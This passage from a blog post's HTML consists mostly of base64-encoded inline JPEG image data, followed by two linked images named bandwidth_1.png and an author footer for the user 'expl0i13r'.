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" /><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHXvOGbaQXvrK8y1o7v8hJnTZK-vYclVGYQINcCUss4xC5IQdC2eLFcwqhsNWjZQNWzHuCaLhP5CcQ527mPFrRM5TM22vLx3cGRdeUqKqJ-guttiaENpwSxDQBqr9nQSUIU177Ic6KQ_w5/s1600/bandwidth_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHXvOGbaQXvrK8y1o7v8hJnTZK-vYclVGYQINcCUss4xC5IQdC2eLFcwqhsNWjZQNWzHuCaLhP5CcQ527mPFrRM5TM22vLx3cGRdeUqKqJ-guttiaENpwSxDQBqr9nQSUIU177Ic6KQ_w5/s400/bandwidth_1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNIjDcyoH_Sba-JX6GJaziMMmqdwd1S5ZBHCr-RG_rXlSHcx-Ci13E6AUjpuK6dWbqYopJCDFAnXqDeDXjWjcg0uX_SsZ4ZDGCSv78SKkfLeOvhcFtzcahhadfr5wN1MfQ4JgQeWGKZBDw/s1600/bandwidth_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNIjDcyoH_Sba-JX6GJaziMMmqdwd1S5ZBHCr-RG_rXlSHcx-Ci13E6AUjpuK6dWbqYopJCDFAnXqDeDXjWjcg0uX_SsZ4ZDGCSv78SKkfLeOvhcFtzcahhadfr5wN1MfQ4JgQeWGKZBDw/s400/bandwidth_1.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0